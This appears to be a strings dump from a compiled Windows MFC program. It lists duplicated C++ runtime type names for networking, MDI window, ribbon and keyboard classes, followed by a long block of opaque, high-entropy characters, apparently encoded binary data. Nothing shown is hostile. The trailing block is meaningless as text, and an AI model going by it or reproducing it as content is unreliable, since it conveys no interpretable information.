.?AVCFtpConnection@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AVCToolCmdUI@@
.?AVCToolCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCKeyboardManager@@
.?AVCKeyboardManager@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AVCMFCWindowsManagerDialog@@
.?AVCMFCWindowsManagerDialog@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCHotKeyCtrl@@
.?AVCHotKeyCtrl@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCOleCmdUI@@
.?AVCOleCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
XGCCA_ggqfQQe0ggrmSSK=ggKfuuw/jjxKlleHqqv/ttGKMMB5nnf^EE3%XXN SSNASSA ddY~vvKCjjsLllvfxxu%uudcxxY,ppx=ggz$mm2o99JQggronnfVXXc.ttNXjjwsbbJLccJ~IIyIppHqIIuCXXx)LLGxttmVLLx3vvJaNNE}ttc2dd1qnn32xxyrCCp]ttAThhNWddCwkkszLLn>XXd7HH1tpp4"uu2sxxs.LLi\uupullNBccB.nnIxwwriLLt/vvJMggUZoocjxxLDll36ddW,XXpHNN8bbbHlld466sKCCrobbPpttpFjjmPttwIllxOwwpUddnrXX1TLLEGSS3wxxo*jjvaVVLfWWG/NNH$SSG`ddq`CCHR00O"CCHPHH3Auu1e33q~WW1,qqL0mmp1ll2^uuwnIInVnnrBoo5zwwdMwwVISS3ggv"XXE&CCx9llO9WWm~LLhVCCmIdd6!uuG3jjN4bbc!jjurvveXUUE/ll1R00B1llf6bbV.XXwSxxk0wwwSnncPggHO33V^kkeIxxxfnnxAggqQCCJM33Y\ppeclls CCJ&VV4foor3ll5BXXmXnnnQWWx$LL4[kkfhggI@kkmRnnnvmmwY33W CCe>RRl\QQx\qqoDggwVxxeFllN"VVzEWWw|dd3{llNXddz=ll3vnn6jkkcttB1EEBpwwK!ddRKSSxWNNWnjjzzNNzFll3hjj5\ggv/IIbOuuwillWQXXH`LLV$ttGHMMB&XXwf33d*oo24ddO8ooJC66t4jjNUFF30WWfRdddmuuHe33l`mmHs00mDxxx~xxndmmfYFFZ\jjdaggR%WW2:dd5Cnnvl66V)ppBFLL5Exx1rxxCVggvGXXoSpp2f553AXXeaRR3vWWH)nne$ggp/jjxMttx_MMVvXXNcll8MSS2)IIB{uuN4jjJEttvWNNMLuuGNNN6Pjje~33vdQQc3jjf nnJ*FFZ%SSr0FF6"ppd^VVenhhH\RRUiCCv9RRPJbb2KLLR6wwK@FFV\XX3XXX1QuuvCVV4;mmcXddBDnnehIIlGWWJ0lle:jjG.ttEKQQdYqqe(XXZ0jjw&mmr~nnOTWWe8nnN3ggf llxrppm.xxzgppf!NNiHkkm.ttUMttN%VVu8oodKxx4}uurZnnTWSSvDNNattw.33m#QQw,xx8hmm1,RRuWppfKeeVBuuvVnnV!SSv/VVeBSSwJLLNaooHbgg4jbbNNXXWGnneM66kibbJ)XXZ!ood`nnb@QQ24VVpojjev00yBQQdSllwGbbwWnnZ}WWdgFF6=SS4,ggmRxxB{ddLxggxAnnK=SSzVttP[lldDXXVnWWzbxx4&ppNZxxk`SSf^IIN.jjwXSSN\wwA@nnifXX2Gggh-CCe~XX5-kks%LLG/XXN,gg6lvvH9RRx6XXr2wwR:xxZ(VV5dooN(aa4qkkvgnn3Qmmcpdd8AWWd/ddOJppzrnnb3ccNjll5IuuHB66V[xx1mLLMFWWzFlljlWWw900CRjj1~eeE$ppNHXXUfoopQjjYXllpannJ-hhB0ddoajj2KddBYSSswllRNbbx2VVkfXXG#VVq{SSeAIIxmjjG_jj2]ppNYMM1,llJMjjO)ppsTlld=bb2=00A*QQckllo-oo1|HHE7nnB~bbEoWWe?66LRnnfEddz}SSH»Ajjj4ZXXEZppNyddz,llJDNNYWccJp991SggH1HH2&QQpnXX8[hhJ}llT{mmKZHH3hSSN{66hwCCBAllL4QQ1qMMJ%WWr%jju|ccGQbbZ3bbZ{dd51CCmALLt]ppG2xxfCSSx>gge9uue3nnyWvvJjgg3!uux;aaR_WWd9VVu&llmjbbHcggcdHHNtccJUHH3ebbvVMMRivvB)ddWqpp2|ggiBSSf^XXKjjV'ccZ`aaR/jjzQaaR~uuz]tt23jjmv66GcCCvxEEB%yysEggN2CCfmxxD%QQJiddISnnm7tt8`ttKZxxE4QQv@ggTIXXdS00G6bbxQ99E2uupuooEtuupLaaAvjjGYwwY\nnc6VVN.ttB5EEBvnnG-NNvKppJjLL4JppG-jj1^QQxfXXG;jj3TMMJIttG=MMB[QQrCxx6WmmG7nnphjjs4ddr]QQNuMMRXxxz;ll6AooB:eeP7uup0XXl9kkeQllExwwzZggErXXHTVVBCQQcYllr>nnH566Y`kkc;llIdCCc6VVp3xx4,nnP6wweOUUJjjY9ttc[LLk5jjGpxxYUllpZxxb_mmHsSSArQQf2dccHHEE2iCCxOggIoWWfsddV8QQN^XXt>ggfESSVhXXwQddu_nnd{qquenn2Rll4Ejje3xx3Yjj4vnniwWW4yxxvfbb4zggkTmmNvllq>nnH